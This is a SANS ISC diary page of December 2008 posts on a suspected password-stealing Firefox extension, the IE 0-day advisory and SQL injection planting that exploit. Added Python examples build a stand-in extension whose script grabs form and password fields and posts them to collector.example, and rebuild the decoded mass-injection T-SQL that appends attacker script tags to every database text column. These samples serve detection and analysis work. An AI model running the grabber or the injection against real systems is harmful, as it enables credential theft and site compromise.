
SANS ISC InfoSec Handlers Diary Blog


Firefox extension used as password stealer?

Published: 2008-12-12
Last Updated: 2008-12-13 00:53:46 UTC
by Johannes Ullrich (Version: 2)
1 comment(s)

Thanks a lot to our reader David who took the time to analyze this in more detail. It appears to be a "harmless" plugin / maybe adware. But no passwords are stolen this time. Thanks!


A reader sent us a suspicious e-mail, which included a link to an .xpi file (a Firefox extension) as an attachment. Looks like a very nice find! I am still looking at the extension. Just from a preliminary glance at it, the extension may try to steal the content of form fields.

The origin appears to be Russian. The link went to ht tp : //qs-s.  nm.  ru (again: spaces inserted to protect the innocent)


The e-mail:

We have received mnoey. Here your book. Read and grow rich!
ht tp:// qs-s. nm. ru - We have received money. Here your book. Read adn grow rich!

(and thanks for the person posting the comment below to point out I forgot to break up the second instance of the URL :-) ).

Still working on figuring out exactly what this does, e.g. whether it is just adware or actually steals passwords. May have to wait until I get home and get to run it in the lab.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


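Checking what an .xpi actually does starts from the fact that it is a plain ZIP archive: install.rdf and chrome.manifest describe the extension, and the scripts under chrome/content/ are what run inside the browser with full chrome privileges. The following is an added example, not the extension from the reader's e-mail nor David's analysis of it: it builds a constructed stand-in archive whose overlay script carries the hallmarks of a form grabber, then scans every script in the archive for form access, password-field checks, submit hooks, outbound requests and remote hosts. The member names, the collector.example host and the pattern list are assumptions made for the demonstration.

```python
import io
import re
import zipfile

# API surface a form grabber tends to touch. A hit is a lead to read the code
# around it, not a verdict; legitimate extensions use some of these too.
SUSPECT_PATTERNS = {
    "form_access": re.compile(
        r"\bdocument\.forms\b|getElementsByTagName\(\s*['\"](?:form|input)['\"]"),
    "password_field": re.compile(r"type\s*===?\s*['\"]password['\"]", re.I),
    "submit_hook": re.compile(
        r"addEventListener\(\s*['\"](?:submit|load|DOMContentLoaded)['\"]"),
    "exfil": re.compile(
        r"XMLHttpRequest|\.open\(\s*['\"](?:GET|POST)['\"]|new\s+Image\(\)"),
    "remote_host": re.compile(r"https?://[A-Za-z0-9.\-]+"),
}
SCRIPT_SUFFIXES = (".js", ".jsm", ".xul")
# Namespace URIs every XUL/RDF file carries; these are not contact points.
NAMESPACE_HOSTS = {"www.mozilla.org", "www.w3.org"}


def triage_xpi(data):
    """Scan every script-bearing member of an .xpi (a ZIP) for the patterns above.

    Returns {member_name: {pattern_name: [matched text, ...]}}, omitting members
    and patterns with no hits.
    """
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith(SCRIPT_SUFFIXES):
                continue
            text = archive.read(info).decode("utf-8", errors="replace")
            hits = {name: pat.findall(text) for name, pat in SUSPECT_PATTERNS.items()}
            hits = {name: found for name, found in hits.items() if found}
            if hits:
                report[info.filename] = hits
    return report


def remote_hosts(report):
    """Hosts the scripts talk to, with XML namespace noise removed."""
    hosts = set()
    for hits in report.values():
        for url in hits.get("remote_host", []):
            host = url.split("//", 1)[1]
            if host not in NAMESPACE_HOSTS:
                hosts.add(host)
    return sorted(hosts)


def build_sample_xpi():
    """Constructed stand-in archive (not the extension from the e-mail): a browser
    overlay whose script reads form fields on submit and posts them away."""
    install_rdf = (
        '<?xml version="1.0"?>\n'
        '<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n'
        '     xmlns:em="http://www.mozilla.org/2004/em-rdf#">\n'
        '  <Description about="urn:mozilla:install-manifest">\n'
        '    <em:id>sample@example.invalid</em:id>\n'
        '    <em:name>Sample Book Reader</em:name>\n'
        '  </Description>\n</RDF>\n')
    chrome_manifest = (
        "content sample chrome/content/\n"
        "overlay chrome://browser/content/browser.xul chrome://sample/content/overlay.xul\n")
    overlay_xul = (
        '<?xml version="1.0"?>\n'
        '<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">\n'
        '  <script src="overlay.js"/>\n</overlay>\n')
    overlay_js = (
        'window.addEventListener("load", function () {\n'
        '  gBrowser.addEventListener("submit", function (e) {\n'
        '    var out = [];\n'
        '    var inputs = e.target.getElementsByTagName("input");\n'
        '    for (var i = 0; i < inputs.length; i++) {\n'
        '      if (inputs[i].type == "password" || inputs[i].type == "text")\n'
        '        out.push(inputs[i].name + "=" + inputs[i].value);\n'
        '    }\n'
        '    var req = new XMLHttpRequest();\n'
        '    req.open("POST", "http://collector.example/in.php", true);\n'
        '    req.send(out.join("&"));\n'
        '  }, true);\n'
        '}, false);\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("install.rdf", install_rdf)
        archive.writestr("chrome.manifest", chrome_manifest)
        archive.writestr("chrome/content/overlay.xul", overlay_xul)
        archive.writestr("chrome/content/overlay.js", overlay_js)
    return buf.getvalue()


if __name__ == "__main__":
    findings = triage_xpi(build_sample_xpi())
    for member, hits in findings.items():
        print(member)
        for name, found in hits.items():
            print(f"  {name}: {found}")
    print("talks to:", remote_hosts(findings))
```

On a real sample, pass the bytes of the downloaded .xpi to triage_xpi() instead of the constructed archive; the submit hook plus a password-type check plus an outbound request in the same script is the combination worth reading line by line, while a remote host alone is often just an update URL.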

Browser Security Handbook

Published: 2008-12-12
Last Updated: 2008-12-12 20:16:07 UTC
by Swa Frantzen (Version: 1)
0 comment(s)

I've been having a lot of fun, and gaining quite some additional insight into what makes one browser different from the next, reading the Google Browser Security Handbook by Michal Zalewski today.

I've not yet touched on the testing toolkit they have available for download, but the three sections of the document are quite interesting.

Highly recommended reading!

Swa Frantzen -- Section 66


Internet Storm Center Podcast Episode Twelve

Published: 2008-12-12
Last Updated: 2008-12-12 15:40:41 UTC
by Joel Esler (Version: 1)
0 comment(s)

Hey everyone, sorry it has taken so long to get around to recording another podcast episode.  Travel schedules have been very crazy between us lately.  Anyway, enough excuses, here is episode twelve. 

All the podcasts

Just this podcast

Podcast through iTunes

-- Joel Esler

Keywords: podcast

IE7 0day expanded to include IE6 and IE8(beta) -- now others

Published: 2008-12-12
Last Updated: 2008-12-12 12:37:57 UTC
by Kevin Liston (Version: 2)
1 comment(s)

Microsoft has updated Security Advisory (961051) to include Microsoft Internet Explorer 6 and Windows Internet Explorer 8(beta).

This is the vulnerability discussed in these recent articles:


I don't want to start a panic. We have not received any reports of attacks affecting these versions (yet).


The advisory has been updated again to say:

Our investigation so far has shown that these attacks are only against Windows Internet Explorer 7 on supported editions of Windows XP Service Pack 2, Windows XP Service Pack 3, Windows Server 2003 Service Pack 1, Windows Server 2003 Service Pack 2, Windows Vista, Windows Vista Service Pack 1, and Windows Server 2008. Microsoft Internet Explorer 5.01 Service Pack 4, Microsoft Internet Explorer 6 Service Pack 1, Microsoft Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 on all supported versions of Microsoft Windows are potentially vulnerable.

Emphasis is mine.

What is confirmed to be vulnerable:

  • Internet Explorer 7

What is potentially vulnerable:

  • Internet Explorer 5.01 SP4
  • Internet Explorer 6
  • Internet Explorer 6 SP1
  • Internet Explorer 8 Beta 2



Keywords: 0day ie

MSIE 0-day Spreading Via SQL Injection

Published: 2008-12-12
Last Updated: 2008-12-12 01:00:18 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

One of our readers submitted this log entry, which shows a typical SQL injection exploit. The "new" part is that the JavaScript injected in this case is trying to exploit the MSIE 0-day:

In this case, the SQL injection is delivered as a cookie, not a GET parameter.

I broke up the strings for readability and inserted spaces around the malicious URL. As usual with these kinds of exploits, the script loads another script, which loads yet another, ultimately leading to the IE exploit.


Cookie: ref=ef';DECLA RE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263

F43415445205461626C655F437572736F72 AS VARCHAR(4000));exec (@S);--

Decoded (with the column list, join predicate and cursor loop written out in full):

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
                                       b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
  exec('update ['+@T+']
   set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
       ''<script src=http:// 17gamo . com/1.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

In words: the cursor walks every user table (xtype='u') and every text, ntext, nvarchar or varchar column in it (xtype 35, 99, 231 and 167) and appends the script tag to every value, so any page that renders that data afterwards pulls the attacker's JavaScript. Nothing is exfiltrated from the database itself; the site is turned into a delivery vehicle for the browser exploit.


Johannes B. Ullrich, Ph.D.
SANS Technology Institute

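Reading entries like this one out of a web-server log is easier once the CAST(0x...) wrapper is peeled off, and the same routine doubles as a detection rule that does not depend on where the injection was carried. The following is an added example, not the reader's log or any ISC tool: it decodes the hex literal out of a cookie or query string, confirms the exec(@S) pattern that goes with it, and pulls the planted script URL out of the decoded T-SQL. The request samples, the parameter names and the evil.example domain are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS [N]VARCHAR(n)) is how the batch hides from keyword filters;
# the N prefix decides whether the bytes are single-byte or UTF-16LE.
HEX_CAST_RE = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)", re.I)
EXEC_VAR_RE = re.compile(r"\bEXEC\s*\(\s*@\w+\s*\)", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\s+src\s*=\s*['\"]?([^'\"\s>]+)", re.I)
SUSPECT_KEYWORDS = ("sysobjects", "syscolumns", "cursor", "update ", "<script")


def decode_hex_literal(hexdigits, nchar=False):
    """Turn the 0x... literal back into the SQL text the server would run."""
    if len(hexdigits) % 2:        # truncated in transit or in the log: cannot decode
        return None
    raw = bytes.fromhex(hexdigits)
    return raw.decode("utf-16-le" if nchar else "latin-1", errors="replace")


def inspect_request(path_query, headers):
    """Look for a hex-wrapped T-SQL batch in the request line and in every header.

    Returns {location: {"decoded_sql": ..., "script_urls": [...], "keywords": [...]}}
    with one entry per location that carried an injection; empty if none did.
    """
    findings = {}
    candidates = {"url": unquote_plus(path_query)}
    for name, value in headers.items():
        candidates["header:" + name] = unquote_plus(value)   # cookies are often %-encoded
    for where, text in candidates.items():
        cast = HEX_CAST_RE.search(text)
        if not cast or not EXEC_VAR_RE.search(text):
            continue
        decoded = decode_hex_literal(cast.group(1), nchar=bool(cast.group(2)))
        if decoded is None:
            continue
        lowered = decoded.lower()
        findings[where] = {
            "decoded_sql": decoded,
            "script_urls": SCRIPT_SRC_RE.findall(decoded),
            "keywords": [k for k in SUSPECT_KEYWORDS if k in lowered],
        }
    return findings


# --- constructed samples (not the reader's log) -------------------------------
# Same structure as the decoded statement in the diary; placeholder domain.
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']="
    "rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://evil.example/1.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_HEX = SAMPLE_SQL.encode("latin-1").hex().upper()

# Injection carried in the Cookie header, as in the reader's submission.
COOKIE_ATTACK = ("/products.asp?id=7", {
    "Cookie": "ref=ef';DECLARE @S VARCHAR(4000);SET @S=CAST(0x" + SAMPLE_HEX
              + " AS VARCHAR(4000));exec (@S);--",
})
# The older GET-parameter form, percent-encoded the way it appears in access logs.
QUERY_ATTACK = ("/products.asp?id=7%3BDECLARE%20@S%20VARCHAR(4000)%3BSET%20@S%3DCAST(0x"
                + SAMPLE_HEX + "%20AS%20VARCHAR(4000))%3Bexec(@S)--", {})
BENIGN = ("/products.asp?id=7", {"Cookie": "ref=ef; session=0x1F2E"})


if __name__ == "__main__":
    for label, (path, hdrs) in (("cookie", COOKIE_ATTACK), ("query", QUERY_ATTACK), ("benign", BENIGN)):
        result = inspect_request(path, hdrs)
        for where, hit in result.items():
            print(f"{label}: injection in {where}; plants {hit['script_urls']}; markers {hit['keywords']}")
        if not result:
            print(f"{label}: clean")
```

Two points the samples make: a rule that only inspects the query string never sees the cookie variant, so feed every header through the same check; and matching on the CAST(0x...)/exec(@S) wrapper rather than on SQL keywords catches the batch regardless of what it contains, while the decoded text gives you the script host to block at the proxy and to grep for in the database.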